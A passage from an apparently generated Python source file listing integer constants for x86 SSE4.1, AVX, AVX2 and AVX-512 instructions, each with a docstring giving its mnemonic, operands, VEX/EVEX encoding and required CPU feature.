"""
``VPABSD ymm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.66.0F38.W0 1E /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSD_ZMM_K1Z_ZMMM512B32: int = 2725
"""
``VPABSD zmm1 {k1}{z}, zmm2/m512/m32bcst``
``EVEX.512.66.0F38.W0 1E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_XMM_K1Z_XMMM128B64: int = 2726
"""
``VPABSQ xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.66.0F38.W1 1F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_YMM_K1Z_YMMM256B64: int = 2727
"""
``VPABSQ ymm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.66.0F38.W1 1F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPABSQ_ZMM_K1Z_ZMMM512B64: int = 2728
"""
``VPABSQ zmm1 {k1}{z}, zmm2/m512/m64bcst``
``EVEX.512.66.0F38.W1 1F /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXBW_XMM_XMMM64: int = 2729
"""
``PMOVSXBW xmm1, xmm2/m64``
``66 0F 38 20 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBW_XMM_XMMM64: int = 2730
"""
``VPMOVSXBW xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 20 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBW_YMM_XMMM128: int = 2731
"""
``VPMOVSXBW ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 20 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_XMM_K1Z_XMMM64: int = 2732
"""
``VPMOVSXBW xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_YMM_K1Z_XMMM128: int = 2733
"""
``VPMOVSXBW ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSXBW_ZMM_K1Z_YMMM256: int = 2734
"""
``VPMOVSXBW zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 20 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_XMMM64_K1Z_XMM: int = 2735
"""
``VPMOVSWB xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_XMMM128_K1Z_YMM: int = 2736
"""
``VPMOVSWB xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 20 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVSWB_YMMM256_K1Z_ZMM: int = 2737
"""
``VPMOVSWB ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 20 /r``
``AVX512BW``
``16/32/64-bit``
"""
PMOVSXBD_XMM_XMMM32: int = 2738
"""
``PMOVSXBD xmm1, xmm2/m32``
``66 0F 38 21 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBD_XMM_XMMM32: int = 2739
"""
``VPMOVSXBD xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 21 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBD_YMM_XMMM64: int = 2740
"""
``VPMOVSXBD ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 21 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_XMM_K1Z_XMMM32: int = 2741
"""
``VPMOVSXBD xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_YMM_K1Z_XMMM64: int = 2742
"""
``VPMOVSXBD ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBD_ZMM_K1Z_XMMM128: int = 2743
"""
``VPMOVSXBD zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 21 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM32_K1Z_XMM: int = 2744
"""
``VPMOVSDB xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM64_K1Z_YMM: int = 2745
"""
``VPMOVSDB xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 21 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDB_XMMM128_K1Z_ZMM: int = 2746
"""
``VPMOVSDB xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 21 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXBQ_XMM_XMMM16: int = 2747
"""
``PMOVSXBQ xmm1, xmm2/m16``
``66 0F 38 22 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXBQ_XMM_XMMM16: int = 2748
"""
``VPMOVSXBQ xmm1, xmm2/m16``
``VEX.128.66.0F38.WIG 22 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXBQ_YMM_XMMM32: int = 2749
"""
``VPMOVSXBQ ymm1, xmm2/m32``
``VEX.256.66.0F38.WIG 22 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_XMM_K1Z_XMMM16: int = 2750
"""
``VPMOVSXBQ xmm1 {k1}{z}, xmm2/m16``
``EVEX.128.66.0F38.WIG 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_YMM_K1Z_XMMM32: int = 2751
"""
``VPMOVSXBQ ymm1 {k1}{z}, xmm2/m32``
``EVEX.256.66.0F38.WIG 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXBQ_ZMM_K1Z_XMMM64: int = 2752
"""
``VPMOVSXBQ zmm1 {k1}{z}, xmm2/m64``
``EVEX.512.66.0F38.WIG 22 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM16_K1Z_XMM: int = 2753
"""
``VPMOVSQB xmm1/m16 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM32_K1Z_YMM: int = 2754
"""
``VPMOVSQB xmm1/m32 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 22 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQB_XMMM64_K1Z_ZMM: int = 2755
"""
``VPMOVSQB xmm1/m64 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 22 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXWD_XMM_XMMM64: int = 2756
"""
``PMOVSXWD xmm1, xmm2/m64``
``66 0F 38 23 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXWD_XMM_XMMM64: int = 2757
"""
``VPMOVSXWD xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 23 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXWD_YMM_XMMM128: int = 2758
"""
``VPMOVSXWD ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 23 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_XMM_K1Z_XMMM64: int = 2759
"""
``VPMOVSXWD xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.WIG 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_YMM_K1Z_XMMM128: int = 2760
"""
``VPMOVSXWD ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.WIG 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWD_ZMM_K1Z_YMMM256: int = 2761
"""
``VPMOVSXWD zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.WIG 23 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_XMMM64_K1Z_XMM: int = 2762
"""
``VPMOVSDW xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_XMMM128_K1Z_YMM: int = 2763
"""
``VPMOVSDW xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 23 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSDW_YMMM256_K1Z_ZMM: int = 2764
"""
``VPMOVSDW ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 23 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXWQ_XMM_XMMM32: int = 2765
"""
``PMOVSXWQ xmm1, xmm2/m32``
``66 0F 38 24 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXWQ_XMM_XMMM32: int = 2766
"""
``VPMOVSXWQ xmm1, xmm2/m32``
``VEX.128.66.0F38.WIG 24 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXWQ_YMM_XMMM64: int = 2767
"""
``VPMOVSXWQ ymm1, xmm2/m64``
``VEX.256.66.0F38.WIG 24 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_XMM_K1Z_XMMM32: int = 2768
"""
``VPMOVSXWQ xmm1 {k1}{z}, xmm2/m32``
``EVEX.128.66.0F38.WIG 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_YMM_K1Z_XMMM64: int = 2769
"""
``VPMOVSXWQ ymm1 {k1}{z}, xmm2/m64``
``EVEX.256.66.0F38.WIG 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXWQ_ZMM_K1Z_XMMM128: int = 2770
"""
``VPMOVSXWQ zmm1 {k1}{z}, xmm2/m128``
``EVEX.512.66.0F38.WIG 24 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM32_K1Z_XMM: int = 2771
"""
``VPMOVSQW xmm1/m32 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM64_K1Z_YMM: int = 2772
"""
``VPMOVSQW xmm1/m64 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 24 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQW_XMMM128_K1Z_ZMM: int = 2773
"""
``VPMOVSQW xmm1/m128 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 24 /r``
``AVX512F``
``16/32/64-bit``
"""
PMOVSXDQ_XMM_XMMM64: int = 2774
"""
``PMOVSXDQ xmm1, xmm2/m64``
``66 0F 38 25 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMOVSXDQ_XMM_XMMM64: int = 2775
"""
``VPMOVSXDQ xmm1, xmm2/m64``
``VEX.128.66.0F38.WIG 25 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMOVSXDQ_YMM_XMMM128: int = 2776
"""
``VPMOVSXDQ ymm1, xmm2/m128``
``VEX.256.66.0F38.WIG 25 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_XMM_K1Z_XMMM64: int = 2777
"""
``VPMOVSXDQ xmm1 {k1}{z}, xmm2/m64``
``EVEX.128.66.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_YMM_K1Z_XMMM128: int = 2778
"""
``VPMOVSXDQ ymm1 {k1}{z}, xmm2/m128``
``EVEX.256.66.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSXDQ_ZMM_K1Z_YMMM256: int = 2779
"""
``VPMOVSXDQ zmm1 {k1}{z}, ymm2/m256``
``EVEX.512.66.0F38.W0 25 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_XMMM64_K1Z_XMM: int = 2780
"""
``VPMOVSQD xmm1/m64 {k1}{z}, xmm2``
``EVEX.128.F3.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_XMMM128_K1Z_YMM: int = 2781
"""
``VPMOVSQD xmm1/m128 {k1}{z}, ymm2``
``EVEX.256.F3.0F38.W0 25 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVSQD_YMMM256_K1Z_ZMM: int = 2782
"""
``VPMOVSQD ymm1/m256 {k1}{z}, zmm2``
``EVEX.512.F3.0F38.W0 25 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_XMM_XMMM128: int = 2783
"""
``VPTESTMB k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_YMM_YMMM256: int = 2784
"""
``VPTESTMB k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMB_KR_K1_ZMM_ZMMM512: int = 2785
"""
``VPTESTMB k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W0 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_XMM_XMMM128: int = 2786
"""
``VPTESTMW k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.66.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_YMM_YMMM256: int = 2787
"""
``VPTESTMW k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.66.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMW_KR_K1_ZMM_ZMMM512: int = 2788
"""
``VPTESTMW k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.66.0F38.W1 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_XMM_XMMM128: int = 2789
"""
``VPTESTNMB k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.F3.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_YMM_YMMM256: int = 2790
"""
``VPTESTNMB k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.F3.0F38.W0 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMB_KR_K1_ZMM_ZMMM512: int = 2791
"""
``VPTESTNMB k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.F3.0F38.W0 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_XMM_XMMM128: int = 2792
"""
``VPTESTNMW k2 {k1}, xmm2, xmm3/m128``
``EVEX.128.F3.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_YMM_YMMM256: int = 2793
"""
``VPTESTNMW k2 {k1}, ymm2, ymm3/m256``
``EVEX.256.F3.0F38.W1 26 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTNMW_KR_K1_ZMM_ZMMM512: int = 2794
"""
``VPTESTNMW k2 {k1}, zmm2, zmm3/m512``
``EVEX.512.F3.0F38.W1 26 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_XMM_XMMM128B32: int = 2795
"""
``VPTESTMD k2 {k1}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_YMM_YMMM256B32: int = 2796
"""
``VPTESTMD k2 {k1}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMD_KR_K1_ZMM_ZMMM512B32: int = 2797
"""
``VPTESTMD k2 {k1}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_XMM_XMMM128B64: int = 2798
"""
``VPTESTMQ k2 {k1}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_YMM_YMMM256B64: int = 2799
"""
``VPTESTMQ k2 {k1}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTMQ_KR_K1_ZMM_ZMMM512B64: int = 2800
"""
``VPTESTMQ k2 {k1}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_XMM_XMMM128B32: int = 2801
"""
``VPTESTNMD k2 {k1}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_YMM_YMMM256B32: int = 2802
"""
``VPTESTNMD k2 {k1}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.0F38.W0 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMD_KR_K1_ZMM_ZMMM512B32: int = 2803
"""
``VPTESTNMD k2 {k1}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.F3.0F38.W0 27 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_XMM_XMMM128B64: int = 2804
"""
``VPTESTNMQ k2 {k1}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.F3.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_YMM_YMMM256B64: int = 2805
"""
``VPTESTNMQ k2 {k1}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.F3.0F38.W1 27 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPTESTNMQ_KR_K1_ZMM_ZMMM512B64: int = 2806
"""
``VPTESTNMQ k2 {k1}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.F3.0F38.W1 27 /r``
``AVX512F``
``16/32/64-bit``
"""
PMULDQ_XMM_XMMM128: int = 2807
"""
``PMULDQ xmm1, xmm2/m128``
``66 0F 38 28 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPMULDQ_XMM_XMM_XMMM128: int = 2808
"""
``VPMULDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 28 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPMULDQ_YMM_YMM_YMMM256: int = 2809
"""
``VPMULDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 28 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPMULDQ_XMM_K1Z_XMM_XMMM128B64: int = 2810
"""
``VPMULDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULDQ_YMM_K1Z_YMM_YMMM256B64: int = 2811
"""
``VPMULDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 28 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPMULDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 2812
"""
``VPMULDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 28 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_XMM_KR: int = 2813
"""
``VPMOVM2B xmm1, k1``
``EVEX.128.F3.0F38.W0 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_YMM_KR: int = 2814
"""
``VPMOVM2B ymm1, k1``
``EVEX.256.F3.0F38.W0 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2B_ZMM_KR: int = 2815
"""
``VPMOVM2B zmm1, k1``
``EVEX.512.F3.0F38.W0 28 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_XMM_KR: int = 2816
"""
``VPMOVM2W xmm1, k1``
``EVEX.128.F3.0F38.W1 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_YMM_KR: int = 2817
"""
``VPMOVM2W ymm1, k1``
``EVEX.256.F3.0F38.W1 28 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVM2W_ZMM_KR: int = 2818
"""
``VPMOVM2W zmm1, k1``
``EVEX.512.F3.0F38.W1 28 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPEQQ_XMM_XMMM128: int = 2819
"""
``PCMPEQQ xmm1, xmm2/m128``
``66 0F 38 29 /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPCMPEQQ_XMM_XMM_XMMM128: int = 2820
"""
``VPCMPEQQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 29 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPEQQ_YMM_YMM_YMMM256: int = 2821
"""
``VPCMPEQQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 29 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_XMM_XMMM128B64: int = 2822
"""
``VPCMPEQQ k1 {k2}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_YMM_YMMM256B64: int = 2823
"""
``VPCMPEQQ k1 {k2}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 29 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPEQQ_KR_K1_ZMM_ZMMM512B64: int = 2824
"""
``VPCMPEQQ k1 {k2}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F38.W1 29 /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_XMM: int = 2825
"""
``VPMOVB2M k1, xmm1``
``EVEX.128.F3.0F38.W0 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_YMM: int = 2826
"""
``VPMOVB2M k1, ymm1``
``EVEX.256.F3.0F38.W0 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVB2M_KR_ZMM: int = 2827
"""
``VPMOVB2M k1, zmm1``
``EVEX.512.F3.0F38.W0 29 /r``
``AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_XMM: int = 2828
"""
``VPMOVW2M k1, xmm1``
``EVEX.128.F3.0F38.W1 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_YMM: int = 2829
"""
``VPMOVW2M k1, ymm1``
``EVEX.256.F3.0F38.W1 29 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPMOVW2M_KR_ZMM: int = 2830
"""
``VPMOVW2M k1, zmm1``
``EVEX.512.F3.0F38.W1 29 /r``
``AVX512BW``
``16/32/64-bit``
"""
MOVNTDQA_XMM_M128: int = 2831
"""
``MOVNTDQA xmm1, m128``
``66 0F 38 2A /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VMOVNTDQA_XMM_M128: int = 2832
"""
``VMOVNTDQA xmm1, m128``
``VEX.128.66.0F38.WIG 2A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVNTDQA_YMM_M256: int = 2833
"""
``VMOVNTDQA ymm1, m256``
``VEX.256.66.0F38.WIG 2A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_XMM_M128: int = 2834
"""
``VMOVNTDQA xmm1, m128``
``EVEX.128.66.0F38.W0 2A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_YMM_M256: int = 2835
"""
``VMOVNTDQA ymm1, m256``
``EVEX.256.66.0F38.W0 2A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVNTDQA_ZMM_M512: int = 2836
"""
``VMOVNTDQA zmm1, m512``
``EVEX.512.66.0F38.W0 2A /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_XMM_KR: int = 2837
"""
``VPBROADCASTMB2Q xmm1, k1``
``EVEX.128.F3.0F38.W1 2A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_YMM_KR: int = 2838
"""
``VPBROADCASTMB2Q ymm1, k1``
``EVEX.256.F3.0F38.W1 2A /r``
``AVX512VL and AVX512CD``
``16/32/64-bit``
"""
EVEX_VPBROADCASTMB2Q_ZMM_KR: int = 2839
"""
``VPBROADCASTMB2Q zmm1, k1``
``EVEX.512.F3.0F38.W1 2A /r``
``AVX512CD``
``16/32/64-bit``
"""
PACKUSDW_XMM_XMMM128: int = 2840
"""
``PACKUSDW xmm1, xmm2/m128``
``66 0F 38 2B /r``
``SSE4.1``
``16/32/64-bit``
"""
VEX_VPACKUSDW_XMM_XMM_XMMM128: int = 2841
"""
``VPACKUSDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F38.WIG 2B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKUSDW_YMM_YMM_YMMM256: int = 2842
"""
``VPACKUSDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F38.WIG 2B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_XMM_K1Z_XMM_XMMM128B32: int = 2843
"""
``VPACKUSDW xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 2B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_YMM_K1Z_YMM_YMMM256B32: int = 2844
"""
``VPACKUSDW ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 2B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 2845
"""
``VPACKUSDW zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F38.W0 2B /r``
``AVX512BW``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_XMM_XMM_M128: int = 2846
"""
``VMASKMOVPS xmm1, xmm2, m128``
``VEX.128.66.0F38.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMASKMOVPS_YMM_YMM_M256: int = 2847
"""
``VMASKMOVPS ymm1, ymm2, m256``
``VEX.256.66.0F38.W0 2C /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_XMM_K1Z_XMM_XMMM128B32: int = 2848
"""
``VSCALEFPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F38.W0 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_YMM_K1Z_YMM_YMMM256B32: int = 2849
"""
``VSCALEFPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F38.W0 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPS_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 2850
"""
``VSCALEFPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.66.0F38.W0 2C /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_XMM_K1Z_XMM_XMMM128B64: int = 2851
"""
``VSCALEFPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F38.W1 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_YMM_K1Z_YMM_YMMM256B64: int = 2852
"""
``VSCALEFPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F38.W1 2C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VSCALEFPD_ZMM_K1Z_ZMM_ZMMM512B64_ER: int = 2853
"""
``VSCALEFPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{er}``
``EVEX.512.66.0F38.W1 2C /r``
``AVX512F``
``16/32/64-bit``
"""
VEX_VMASKMOVPD_XMM_XMM_M128: int = 2854
"""
``VMASKMOVPD xmm1, xmm2, m128``
